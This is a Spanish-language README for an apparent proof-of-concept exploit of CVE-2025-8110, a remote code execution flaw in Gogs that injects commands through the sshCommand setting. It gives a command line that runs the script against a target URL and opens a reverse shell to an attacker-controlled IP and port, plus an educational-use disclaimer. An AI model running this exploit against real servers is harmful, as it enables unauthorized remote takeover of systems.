
CVE-2025-8110 PoC
Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-8110, una vulnerabilidad de Ejecución Remota de Código (RCE) en Gogs. El exploit apunta a la implementación del servidor SSH interno, permitiendo a los atacantes inyectar comandos maliciosos a través de la configuración sshCommand.
Para ejecutar el exploit, use el script CVE-2025-8110.py con la URL objetivo de Gogs y su host/puerto de escucha para la reverse shell.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: URL base de la instancia de Gogs objetivo (p. ej., http://localhost:3000).-lh, --host: Dirección IP a la que la reverse shell debe conectarse de vuelta.-lp, --port: Puerto al que la reverse shell debe conectarse de vuelta.-x, --proxy: (Opcional) Use un proxy local en http://localhost:8080 para depuración.Esta Prueba de Concepto (PoC) es solo para fines educativos y de investigación. Está pensada para ayudar a investigadores de seguridad y administradores a comprender y mitigar la vulnerabilidad CVE-2025-8110.
El autor no se hace responsable de ningún uso no autorizado o malintencionado de este código. Utilice esta herramienta únicamente en sistemas que le pertenezcan o sobre los que tenga permiso explícito para realizar pruebas. Al usar este código, usted acepta asumir toda la responsabilidad por sus acciones.